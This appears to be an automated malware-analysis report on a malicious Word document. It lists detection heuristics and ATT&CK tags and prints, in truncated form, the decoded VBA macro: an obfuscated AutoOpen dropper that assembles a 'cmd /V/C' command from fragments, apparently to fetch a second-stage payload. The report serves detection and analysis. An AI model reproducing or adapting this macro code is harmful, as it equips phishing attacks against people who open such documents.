MALICIOUS
82
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. The macro attempts to execute a command constructed from concatenated strings, including 'cm', '/V/C', and a series of numbers, likely intended to download and execute a second-stage payload. The presence of the AutoOpen macro and the nature of the script strongly suggest a spearphishing attachment attack vector.
Heuristics 4
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5865 bytes |
SHA-256: 5f6f1b926bbf22e0f270c655f7dd942e928354eb6150166bf0d29e15d2dcb509 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "WAmXIAtsNMof"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
AppActivate CLng(31102 / JUjzRd * CioEbI / qCKTw)
AppActivate CDate(mwZiI)
AppActivate CByte(1518)
AppActivate Chr(83474982)
AppActivate CLng(WUovR)
AppActivate Sin(22129 / UiwpK - 68407 / YjwvG)
Shell@ CVar("cm") + TiihGrvi + MckuVzUTwBBUpz + ABzLqrSGFv + NzHRqWZUzGC + HVAdjVqaY + cirdHzpjSw + tkdazYiARYi, 536295420 - 536295420
AppActivate Chr(nDWzh)
AppActivate CByte(33835 + wIDTBO - UTmvBE - fzdqp)
AppActivate ChrB(55)
End Sub
Attribute VB_Name = "DADLMCj"
Function ABzLqrSGFv()
On Error Resume Next
AppActivate 1833
AppActivate Round(RtnMY)
AppActivate Sin(koNMon + rZnUM / PafPQ / cCSONi)
SUDcI = "d " + "/V/C" + CStr(Chr(qusUuzoCd + zmPGlLOYUzdqM + 34 + NbtPizLJiJWhz + vijTAKkL)) + "s" + "et 9N0" + "=n" + "XQlPkLIoTm" + "Fawfbtz" + "wW9,5-y\" + "HKC(cvrxY'" + ")g" + "SZh$}" + "3@+B{R="
AppActivate CfWGz
AppActivate Sin(QRXufW - XFilDq)
jvkwEOcbFZb = ".dM eDs:" + "7p" + "/uNiV;6E" + "jU&&for %" + "h in" + " (59;8;18;" + "54" + ";32;5"
AppActivate CLng(aiuSZz)
AppActivate Oct(TfWIz + PNuOw)
AppActivate CStr(12)
wIGlS = "6;4" + "0;54;3;3" + ";53;41;64" + ";52;" + "14;" + "49;0;54;" + "18;23" + ";8;15;"
AppActivate 844
AppActivate Sgn(lrIzOT - zijwb)
kddsQf = "68;54;3" + "0;16;5" + "3;62;54;1" + "6;50;19;54" + ";15;28;" + "3;63;5" + "4;0;16;65" + ";41;1" + "5;3;"
AppActivate 736
AppActivate azKhsY
AppActivate Cos(32596 + idMqKP + cVpwA / CXiOhi)
EFGRDbrn = "55;4" + "9;35;40" + ";16;16;5" + "9;57;60" + ";60;14;" + "61;0;" + "5" + "1;12;30;6" + "3;8;0;12" + ";14;" + "12;0;6" + "3;" + "30;50;3"
AppActivate Cos(iozKK)
AppActivate zDhZt
AppActivate pabAXt
quHDYRYuV = "0;8;1" + "0;60;9;5" + "6;39;6;" + "26;" + "8"
AppActivate CStr(2774)
AppActivate Sgn(JIjBJ)
IbLGVL = ";39;69;44;" + "40;1" + "6;" + "16;" + "59;5" + "7;60;" + "60" + ";" + "18;18"
AppActivate Sgn(12262 - KLHDPr + zZHGrG * Tzkoqb)
AppActivate Fuopb
AppActivate CInt(cQYBC + ijHkua)
owXNXisjP = ";18;" + "50;3;5" + "4;12;16;40" + ";5" + "4;3" + "2;5" + "6;40;" + "8" + ";59" + ";58;5" + "8;50;30;" + "8;10;60" + ";15;"
ABzLqrSGFv = SUDcI + jvkwEOcbFZb + wIGlS + kddsQf + EFGRDbrn + quHDYRYuV + IbLGVL + owXNXisjP
AppActivate 8
AppActivate Tan(hCaME)
End Function
Function NzHRqWZUzGC()
On Error Resume Next
AppActivate 520957283
AppActivate CStr(BrpzAA)
AppActivate CDate(LqiriO + EOszVz)
zqsVWbHfABz = "18;54;11;" + "15;8;" + "20;44" + ";40;1" + "6;16;59;57"
AppActivate CBool(zqwbji - clPPr - 69738 + PaAWh)
AppActivate Sqr(wiVoAs - POYkmW)
AppActivate Tan(vkWbKM)
ijOGZ = ";60;6" + "0" + ";" + "0" + ";8;" + "0;37" + ";3;54;" + "5;50;0;54;" + "16" + ";60" + ";"
AppActivate Round(1)
AppActivate CSng(dnEFc)
AppActivate RdaZA
JUkvr = "58;2" + "8;4" + "8;44;4" + "0;16;1" + "6" + ";59;57;6" + "0;60" + ";12;37;32" + ";8" + ";30" + ";8;54;3;6"
AppActivate KMnim
AppActivate Rnd(Xwmlu + kVaLl + wmYKCF * tjJFw)
srURasAL = "3;" + "50;30" + ";8;10;" + "60;" + "30;40;" + "14;67" + ";46;63;" + "44;40;" + "16;16;5" + "9;57;60;" + "60;30;40;1" + "2;3;3" + ";54;0;3"
AppActivate HzOOiM
AppActivate Sqr(uDWfc)
AppActivate Int(OYwwW)
RHPsm = "7" + ";54;" + "32;1" + "5;12" + ";3;3;1" + "6;8;61;" + "32;" + "0;" + "12;" + "10;54;0;16" + ";50;30;8;1" + "0;"
AppActivate Rnd(XwdXz)
AppActivate nlhtXi
aoofPkw = "60;" + "6" + "7;3" + "5" + ";5" + "0;38;59" + ";3;" + "63;16;29" + ";35;44;" + "35;36;65;" + "41;34;"
AppActivate Tan(MbJrj)
AppActivate 4709
bkJpZIGPZ = "34;11;" + "5" + "3;49;53;3" + "5" + ";22;" + "66;43;3" + "5;65;4" + "1;69" + ";46;" + "27;49;41"
AppActivate 284591082
AppActivate Sgn(8)
AppActivate CDbl(ztfQi)
COEjttucw = ";54;0;31;5" + "7;16;5" + "4;10;59;" + "45;3" + "5" + ";25;" + "35
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.